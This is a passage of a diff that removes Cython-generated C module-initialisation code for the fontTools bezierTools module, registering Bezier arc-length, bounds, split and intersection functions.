<<<<<<<<<<<<<< - * except (AttributeError, ImportError): - * # if cython not installed, use mock module with no-op decorators and types - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_COMPILED, Py_True) < 0) __PYX_ERR(0, 13, __pyx_L2_error) - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - } - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - goto __pyx_L7_try_end; - __pyx_L2_error:; - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":14 - * - * COMPILED = cython.compiled - * except (AttributeError, ImportError): # <<<<<<<<<<<<<< - * # if cython not installed, use mock module with no-op decorators and types - * from fontTools.misc import cython - */ - __pyx_t_6 = __Pyx_PyErr_ExceptionMatches2(__pyx_builtin_AttributeError, __pyx_builtin_ImportError); - if (__pyx_t_6) { - __Pyx_AddTraceback("fontTools.misc.bezierTools", __pyx_clineno, __pyx_lineno, __pyx_filename); - if (__Pyx_GetException(&__pyx_t_3, &__pyx_t_2, &__pyx_t_7) < 0) __PYX_ERR(0, 14, __pyx_L4_except_error) - __Pyx_XGOTREF(__pyx_t_3); - __Pyx_XGOTREF(__pyx_t_2); - __Pyx_XGOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":16 - * except (AttributeError, ImportError): - * # if cython not installed, use mock module with no-op decorators and types - * from fontTools.misc import cython # <<<<<<<<<<<<<< - * - * COMPILED = False - */ - __pyx_t_8 = PyList_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_n_s_cython); - __Pyx_GIVEREF(__pyx_n_s_cython); - if (__Pyx_PyList_SET_ITEM(__pyx_t_8, 0, __pyx_n_s_cython)) __PYX_ERR(0, 16, __pyx_L4_except_error); - __pyx_t_9 = __Pyx_Import(__pyx_n_s_fontTools_misc, __pyx_t_8, 0); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_ImportFrom(__pyx_t_9, __pyx_n_s_cython); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cython, __pyx_t_8) < 0) __PYX_ERR(0, 16, __pyx_L4_except_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":18 - * from fontTools.misc import cython - * - * COMPILED = False # <<<<<<<<<<<<<< - * - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_COMPILED, Py_False) < 0) __PYX_ERR(0, 18, __pyx_L4_except_error) - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L3_exception_handled; - } - goto __pyx_L4_except_error; - - /* "fontTools/misc/bezierTools.py":10 - * from collections import namedtuple - * - * try: # <<<<<<<<<<<<<< - * import cython - * - */ - __pyx_L4_except_error:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_4); - __Pyx_XGIVEREF(__pyx_t_5); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_4, __pyx_t_5); - goto __pyx_L1_error; - __pyx_L3_exception_handled:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_4); - __Pyx_XGIVEREF(__pyx_t_5); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_4, __pyx_t_5); - __pyx_L7_try_end:; - } - - /* "fontTools/misc/bezierTools.py":21 - * - * - * Intersection = namedtuple("Intersection", ["pt", "t1", "t2"]) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_namedtuple); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_u_pt); - __Pyx_GIVEREF(__pyx_n_u_pt); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_u_pt)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_t1); - __Pyx_GIVEREF(__pyx_n_u_t1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_u_t1)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_t2); - __Pyx_GIVEREF(__pyx_n_u_t2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_u_t2)) __PYX_ERR(0, 21, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_n_u_Intersection); - __Pyx_GIVEREF(__pyx_n_u_Intersection); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_n_u_Intersection)) __PYX_ERR(0, 21, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (PyDict_SetItem(__pyx_d, __pyx_n_s_Intersection, __pyx_t_2) < 0) __PYX_ERR(0, 21, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":24 - * - * - * __all__ = [ # <<<<<<<<<<<<<< - * "approximateCubicArcLength", - * "approximateCubicArcLengthC", - */ - __pyx_t_2 = PyList_New(28); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 24, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_u_approximateCubicArcLength); - __Pyx_GIVEREF(__pyx_n_u_approximateCubicArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_u_approximateCubicArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateCubicArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_approximateCubicArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_u_approximateCubicArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateQuadraticArcLength); - __Pyx_GIVEREF(__pyx_n_u_approximateQuadraticArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_u_approximateQuadraticArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateQuadraticArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_approximateQuadraticArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 3, __pyx_n_u_approximateQuadraticArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicArcLength); - __Pyx_GIVEREF(__pyx_n_u_calcCubicArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 4, __pyx_n_u_calcCubicArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_calcCubicArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 5, __pyx_n_u_calcCubicArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticArcLength); - __Pyx_GIVEREF(__pyx_n_u_calcQuadraticArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 6, __pyx_n_u_calcQuadraticArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_calcQuadraticArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 7, __pyx_n_u_calcQuadraticArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicBounds); - __Pyx_GIVEREF(__pyx_n_u_calcCubicBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 8, __pyx_n_u_calcCubicBounds)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticBounds); - __Pyx_GIVEREF(__pyx_n_u_calcQuadraticBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 9, __pyx_n_u_calcQuadraticBounds)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitLine); - __Pyx_GIVEREF(__pyx_n_u_splitLine); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 10, __pyx_n_u_splitLine)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitQuadratic); - __Pyx_GIVEREF(__pyx_n_u_splitQuadratic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 11, __pyx_n_u_splitQuadratic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubic); - __Pyx_GIVEREF(__pyx_n_u_splitCubic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 12, __pyx_n_u_splitCubic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitQuadraticAtT_2); - __Pyx_GIVEREF(__pyx_n_u_splitQuadraticAtT_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 13, __pyx_n_u_splitQuadraticAtT_2)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicAtT_2); - __Pyx_GIVEREF(__pyx_n_u_splitCubicAtT_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 14, __pyx_n_u_splitCubicAtT_2)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicAtTC); - __Pyx_GIVEREF(__pyx_n_u_splitCubicAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 15, __pyx_n_u_splitCubicAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicIntoTwoAtTC); - __Pyx_GIVEREF(__pyx_n_u_splitCubicIntoTwoAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 16, __pyx_n_u_splitCubicIntoTwoAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_solveQuadratic); - __Pyx_GIVEREF(__pyx_n_u_solveQuadratic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 17, __pyx_n_u_solveQuadratic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_solveCubic); - __Pyx_GIVEREF(__pyx_n_u_solveCubic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 18, __pyx_n_u_solveCubic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_quadraticPointAtT); - __Pyx_GIVEREF(__pyx_n_u_quadraticPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 19, __pyx_n_u_quadraticPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_cubicPointAtT); - __Pyx_GIVEREF(__pyx_n_u_cubicPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 20, __pyx_n_u_cubicPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_cubicPointAtTC); - __Pyx_GIVEREF(__pyx_n_u_cubicPointAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 21, __pyx_n_u_cubicPointAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_linePointAtT); - __Pyx_GIVEREF(__pyx_n_u_linePointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 22, __pyx_n_u_linePointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_segmentPointAtT); - __Pyx_GIVEREF(__pyx_n_u_segmentPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 23, __pyx_n_u_segmentPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_lineLineIntersections); - __Pyx_GIVEREF(__pyx_n_u_lineLineIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 24, __pyx_n_u_lineLineIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_curveLineIntersections); - __Pyx_GIVEREF(__pyx_n_u_curveLineIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 25, __pyx_n_u_curveLineIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_curveCurveIntersections); - __Pyx_GIVEREF(__pyx_n_u_curveCurveIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 26, __pyx_n_u_curveCurveIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_segmentSegmentIntersections); - __Pyx_GIVEREF(__pyx_n_u_segmentSegmentIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 27, __pyx_n_u_segmentSegmentIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_all, __pyx_t_2) < 0) __PYX_ERR(0, 24, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_1calcCubicArcLength, 0, __pyx_n_s_calcCubicArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_2, __pyx_tuple__14); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_3_split_cubic_into_two, 0, __pyx_n_s_split_cubic_into_two, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__16)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_split_cubic_into_two, __pyx_t_2) < 0) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse, 0, __pyx_n_s_calcCubicArcLengthCRecurse, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__18)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLengthCRecurse, __pyx_t_2) < 0) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":115 - * mult=cython.double, - * ) - * def calcCubicArcLengthC(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic Bezier segment. - * - */ - __pyx_t_2 = PyFloat_FromDouble(((double)0.005)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 115, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 104, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC, 0, __pyx_n_s_calcCubicArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__20)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_2, __pyx_t_3); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":129 - * - * - * epsilonDigits = 6 # <<<<<<<<<<<<<< - * epsilon = 1e-10 - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_epsilonDigits, __pyx_int_6) < 0) __PYX_ERR(0, 129, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":130 - * - * epsilonDigits = 6 - * epsilon = 1e-10 # <<<<<<<<<<<<<< - * - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_epsilon, __pyx_float_1eneg_10) < 0) __PYX_ERR(0, 130, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength, 0, __pyx_n_s_calcQuadraticArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__22)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC, 0, __pyx_n_s_calcQuadraticArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__24)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength, 0, __pyx_n_s_approximateQuadraticArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__25)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 237, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateQuadraticArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 237, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC, 0, __pyx_n_s_approximateQuadraticArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateQuadraticArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_17calcQuadraticBounds, 0, __pyx_n_s_calcQuadraticBounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticBounds, __pyx_t_2) < 0) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_19approximateCubicArcLength, 0, __pyx_n_s_approximateCubicArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateCubicArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC, 0, __pyx_n_s_approximateCubicArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__33)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateCubicArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_23calcCubicBounds, 0, __pyx_n_s_calcCubicBounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicBounds, __pyx_t_2) < 0) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_25splitLine, 0, __pyx_n_s_splitLine, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__37)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitLine, __pyx_t_2) < 0) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_27splitQuadratic, 0, __pyx_n_s_splitQuadratic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__39)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadratic, __pyx_t_2) < 0) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_29splitCubic, 0, __pyx_n_s_splitCubic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__41)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubic, __pyx_t_2) < 0) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_31splitQuadraticAtT, 0, __pyx_n_s_splitQuadraticAtT_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__43)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 589, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadraticAtT_2, __pyx_t_2) < 0) __PYX_ERR(0, 589, __pyx_L1_error) - 